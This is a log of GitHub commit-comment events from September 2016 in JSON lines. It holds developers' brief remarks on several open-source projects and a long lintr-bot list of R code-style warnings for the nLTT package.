{"id":"4560834767","type":"CommitCommentEvent","actor":{"login":"hamishmack"},"repo":{"name":"leksah/leksah"},"payload":{"comment":{"id":19015109,"position":null,"line":null,"path":null,"commit_id":"ec00591ac70e82de2c76ca03767cedc667a09065","created_at":"2016-09-14T09:28:20Z","updated_at":"2016-09-14T09:28:20Z","body":"I think it is convenient because the one it puts in `~/.leksah-0.16` on startup is a copy of the one installed from the data dir.  On systems installed from binaries the admin could modify the the prefs on a shared machine and each user would start with a copy of that modified version.\r\n\r\nWe should try to make it so there is only one copy though.  We could:\r\n\r\n* Generate `data/prefs.lkshp` somehow at build time using this code.\r\n* Use template haskell to load in `data/prefs.lkshp` at compile time (to replace this code).\r\n* Remove this code and change the behaviour when `~/.leksah-0.16/prefs.lkshp` fails to load, so that instead of using this code it tries to load the `prefs.lkshp` file from the leksah data dir.  If that fails it could print an error and exit.\r\n\r\nI think the last option is nicest (but I have no strong opinion)."}},"created_at":"2016-09-14T09:28:20Z"}
{"id":"4560834918","type":"CommitCommentEvent","actor":{"login":"VictorBjelkholm"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19015110,"position":16,"line":23,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T09:28:21Z","updated_at":"2016-09-14T09:28:21Z","body":"Cross platform method: `os.homedir()` https://nodejs.org/api/os.html#os_os_homedir"}},"created_at":"2016-09-14T09:28:21Z"}
{"id":"4560835446","type":"CommitCommentEvent","actor":{"login":"toanph"},"repo":{"name":"toanph/toanphsales"},"payload":{"comment":{"id":19015111,"position":null,"line":null,"path":null,"commit_id":"a9cf366bc8e82187d05abe9e0c6522738c35fd0f","created_at":"2016-09-14T09:28:27Z","updated_at":"2016-09-14T09:28:27Z","body":"as"}},"created_at":"2016-09-14T09:28:27Z"}
{"id":"4560835808","type":"CommitCommentEvent","actor":{"login":"toanph"},"repo":{"name":"toanph/toanphsales"},"payload":{"comment":{"id":19015113,"position":null,"line":null,"path":null,"commit_id":"a9cf366bc8e82187d05abe9e0c6522738c35fd0f","created_at":"2016-09-14T09:28:31Z","updated_at":"2016-09-14T09:28:31Z","body":"a"}},"created_at":"2016-09-14T09:28:31Z"}
{"id":"4560838311","type":"CommitCommentEvent","actor":{"login":"Brave-wan"},"repo":{"name":"Brave-wan/xygolf"},"payload":{"comment":{"id":19015118,"position":null,"line":null,"path":null,"commit_id":"74af68b6d601cb96f9fbd398d6f295521ab9f6de","created_at":"2016-09-14T09:29:01Z","updated_at":"2016-09-14T09:29:01Z","body":"巡鹰高尔夫开发笔记"}},"created_at":"2016-09-14T09:29:01Z"}
{"id":"4560839104","type":"CommitCommentEvent","actor":{"login":"expobrain"},"repo":{"name":"expobrain/GitPython"},"payload":{"comment":{"id":19015119,"position":56,"line":576,"path":"git/util.py","commit_id":"547e6f0e2e9ace80e6d6b08db3c15fe91efe880f","created_at":"2016-09-14T09:29:12Z","updated_at":"2016-09-14T09:29:12Z","body":"I've modified the code to use `O_CREAT`.\r\n\r\nAbout the lock/retry it's supported in the `BlockingLockFile` class which extends `LockFile`."}},"created_at":"2016-09-14T09:29:12Z"}
{"id":"4560841303","type":"CommitCommentEvent","actor":{"login":"meew0"},"repo":{"name":"meew0/discordrb"},"payload":{"comment":{"id":19015126,"position":null,"line":null,"path":null,"commit_id":"a1b4d04c5c06209637d756efe6d139a7b8f2bde3","created_at":"2016-09-14T09:29:38Z","updated_at":"2016-09-14T09:29:38Z","body":"This is certainly not the place to ask questions. Go on the Discord API server and ask there (linked in the README)"}},"created_at":"2016-09-14T09:29:38Z"}
{"id":"4560842257","type":"CommitCommentEvent","actor":{"login":"dushibaiyu"},"repo":{"name":"putaolabs/hunt"},"payload":{"comment":{"id":19015130,"position":null,"line":null,"path":null,"commit_id":"d331e8422a10eaebb4c5d519d1a66d095e34838b","created_at":"2016-09-14T09:29:49Z","updated_at":"2016-09-14T09:29:49Z","body":"Thankes. Now the base Ini is enough. and our ini can write.\r\nsdlang will maybe to use. but now it does not have  demand, and json is enough."}},"created_at":"2016-09-14T09:29:49Z"}
{"id":"4560845558","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19015138,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-14T09:30:28Z","updated_at":"2016-09-14T09:30:28Z","body":"Yes , but \r\n![qq 20160914172950](https://cloud.githubusercontent.com/assets/21981102/18506980/eae5ea46-7aa0-11e6-8de1-1477bfa7d467.png)\r\n"}},"created_at":"2016-09-14T09:30:28Z"}
{"id":"4560846692","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19015140,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T09:30:40Z","updated_at":"2016-09-14T09:30:40Z","body":"After testing your code, it seems to work (but it does ignore erroneous ampersands).\r\n\r\nThe original bug was regarding a well-formed (escaped) url causing a problem. Why not just require that consumers escape their url parameters correctly rather than attempt to do it inside AndroidClientHandler?"}},"created_at":"2016-09-14T09:30:40Z"}
{"id":"4560848205","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19015143,"position":null,"line":null,"path":null,"commit_id":"8163f359b50153aed2bfaa3333a54725e7e39ca2","created_at":"2016-09-14T09:30:56Z","updated_at":"2016-09-14T09:30:56Z","body":"[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:103:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:164:53:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L164) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:178:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:178:103:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:180:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_get_nltt_values.R#L180) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:91:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/inst/doc/vignette_stretch_nltt_matrix.R#L91) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_calculate_weight.R:2:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tweights <- rep(1, 2);\n^\n```\n[tests/testthat/test_calculate_weight.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tparticles <- list();\n^\n```\n[tests/testthat/test_calculate_weight.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:2) {\n^\n```\n[tests/testthat/test_calculate_weight.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tparticles[[i]] <- c(10, 10)\n^~\n```\n[tests/testthat/test_calculate_weight.R:5:17:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​\tweights <- rep(1, 2);\n               ~^\n```\n[tests/testthat/test_calculate_weight.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_calculate_weight.R:6:19:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​\tparticles <- list();\n                 ~^~~\n```\n[tests/testthat/test_calculate_weight.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsigma <- 1;\n^\n```\n[tests/testthat/test_calculate_weight.R:7:12:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:2) {\n           ^\n```\n[tests/testthat/test_calculate_weight.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tprior_density_function <- function(x) {\n^\n```\n[tests/testthat/test_calculate_weight.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[1], min=0, max=1000) *\n^~\n```\n[tests/testthat/test_calculate_weight.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n^~\n```\n[tests/testthat/test_calculate_weight.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:11:32:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tprior_density_function <- function(x) {\n                              ~^~~\n```\n[tests/testthat/test_calculate_weight.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~\n```\n[tests/testthat/test_calculate_weight.R:13:46:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n                                             ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:61:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:90:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:61:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:61:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:88:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                       ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:61:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                                            ^~\n```\n[tests/testthat/test_calculate_weight.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/8163f359b50153aed2bfaa3333a54725e7e39ca2/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```"}},"created_at":"2016-09-14T09:30:56Z"}
{"id":"4560850116","type":"CommitCommentEvent","actor":{"login":"ottolin"},"repo":{"name":"rrrene/credo"},"payload":{"comment":{"id":19015147,"position":16,"line":47,"path":"lib/credo/cli/output/summary.ex","commit_id":"2c51773767fb4438403c4a6fac7422bbeba99c51","created_at":"2016-09-14T09:31:21Z","updated_at":"2016-09-14T09:31:21Z","body":"Should we still keep the line \"(use `--strict` to show all issues, `--help` for options).\" to signal user we do have \"--strict\" and \"--help\" option?"}},"created_at":"2016-09-14T09:31:21Z"}
{"id":"4560852587","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19015154,"position":null,"line":null,"path":null,"commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:31:50Z","updated_at":"2016-09-14T09:31:50Z","body":"Go ahead and close this commit. I will open a new one when we get through this next round of changes. I just wanted you to have a general idea of what is being done. One of the things that I hand to change was the auto complete. It was out dated and no longer supported. So I put in a new one.  Also, I increase the size of the model to accommodate more features and make it easier to see and use. \r\n"}},"created_at":"2016-09-14T09:31:50Z"}
